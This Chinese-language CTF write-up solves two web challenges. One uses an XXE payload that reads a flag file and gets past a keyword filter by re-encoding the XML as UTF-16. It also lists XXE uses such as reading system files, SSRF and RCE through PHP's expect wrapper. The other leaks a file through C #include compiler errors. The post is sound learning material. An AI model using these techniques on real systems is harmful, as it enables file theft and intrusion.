[CSAWQual]Web_Unagi&[FireshellCTF]Caas
两个BUU一分题,不难但也不算太简单
Web_Unagi
题目就是个很明显的XXE,传一个XML文件上去,ban了ENTITY,SYSTEM,file之类的关键字
使用UTF16编码绕过,编码之后这种字符串匹配的waf就根本拦不住我们了,直接读文件就行
<?xml version="1.0" encoding="UTF-16"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY aa SYSTEM "file:///flag" >]>
<users>
<user>
<username>aa</username>
<password>passwd1</password>
<name>aa</name>
<email>[email protected]</email>
<group>CSAW2019</group>
<intro>&aa;</intro>
</user>
</users>
这里主要是记录一下XXE之类的东西,这个题倒是没什么太多可记录的东西
UTF-8 && UTF-16
UTF-8是无敌常见的编码类型,用变长字节指定一个字符,对于ASCII码就是正常的一个字节,其他字符可能用两个或者三个字节表示。UTF-16就固定的用两个字节表示一个字符,对于ASCII码也得使用两个字节,所以每个ASCII码前面也得加一个\x00空字符进去
写了个python脚本逐字符的加\x00进去的不能用。。。不知道是python在read的时候缺了啥还是windows和Linux上换行CLRF之类的区别的问题
插入了一个空字符这种字符串匹配的检测就根本无法拦截我们,编码在xml第一行的定义里写上即可,整个文件都需要进行编码
用这个命令可以直接进行编码转换cat a.xml | iconv -f UTF-8 -t UTF-16BE > payload.xml
BE指的是big endian,对应的还有LE little endian,就是大小端序
有一种说法是直接看文件开头几个字符就能直接确定文件的类型。比如UTF-8是EF BB BF
而UTF-16BE是FF FE
,但是我010editor打开之后并没有看到这些字节。。
XXE的攻击面
XXE可以说是SSRF的一种特化?最常见的攻击方式就是用file://协议之类的进行文件读取了,读/etc/network/interfaces /proc/net/arp /etc/host
这几个文件进行内网探测之类的,不过不能解析的数据同样可以用CDATA拼一下转义掉再外带。也可以发http协议进行ssrf,端口探测。在PHP中支持PHP伪协议,在安装了expect扩展时可以利用其进行RCE,在java中可以使用jar协议文件上传。
[FireshellCTF]Caas
很奇怪的题目,写一个C代码,然后编译完了返回一个二进制文件,不符合语法会报错。
从报错中大概可以猜出来后端逻辑是把输入写入/tmp下一个随机文件名的.c文件,然后gcc编译,编译成功就返回二进制文件,失败就返回报错,看起来整个流程非常的安全,写入文件名不可控,写入文件后缀固定为.c,gcc编译可能用的命令执行但是文件名完全不可控,也没有利用点了
一开始在想有没有命令注入,可能是echo进去的文件之类的(不太现实)。测了一下发现不行。看wp
直接使用了C的#include语句进行了文件包含。。。这我真没想到,好久没写C都忘了这茬了。利用的是报错的外带,因为flag文件肯定不符合C语法,在编译的时候include进来,这里就必然引发一个错误,而报错的点就是引发错误的flag文件,自然就把文件内容外带了
这种利用想法还真令人眼前一亮,完全没想到,学习了
参考链接
Unicode(UTF-8, UTF-16)令人混淆的概念
XXE Bypass WAF
一篇文章带你深入理解漏洞之 XXE 漏洞